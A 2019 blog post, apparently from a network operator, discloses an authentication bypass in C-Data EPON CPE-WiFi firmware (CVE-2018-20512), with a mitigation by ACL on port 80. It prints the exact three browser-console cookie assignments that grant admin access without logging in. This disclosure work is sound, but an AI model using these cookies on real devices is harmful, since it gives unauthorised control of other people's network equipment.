Wednesday, January 2, 2019

Vulnerability in C-Data Technologies EPON CPE-WiFi devices firmware v2.0.4-x000

I recently signed up to receive emails from shadowserver regarding activity in my /19 and /20. Starting December 12, I started getting a lot of emails about IPs showing miria-like activity. After consolidating all of the reports and filtering for unique IPs I was able to take a closer look at the devices. I noticed that all of the affected IPs were using our AdNet (branded) CPE-WiFi EPON units, manufacturer is C-Data Technologies LTD.

I ran nessus against the devices to see if there were any current vulnerabilities, and none were reported back. I took a closer look at the devices myself and noticed that the login cookie was not unique to the device/login.

I was able to use Google Chrome developer console to send the following cookies on an un-logged in device:

document.cookie="cooLogin=1; path=/; expires=2018-12-28T12:03:02.000Z";

document.cookie="cooUser=admin; path=/; expires=2018-12-28T12:03:02.000Z";

document.cookie="timestamp=-1; path=/; expires=2018-12-28T12:03:02.000Z";

I then refreshed the login page and I was greeted with the Admin UI of the device.

I reached out to C-Data and AdNet but have yet to hear back from them since discovering the issue. I also requested a CVE for the issue, and it is currently reserved: CVE-2018-20512

I've never requested a CVE before, so not sure the process to move that out of "RESERVED".

Any who, just wanted to pass this bug along to /r/networking

My temp fix was just to ACL port 80 at our core going to the affected customers.



No comments:

Post a Comment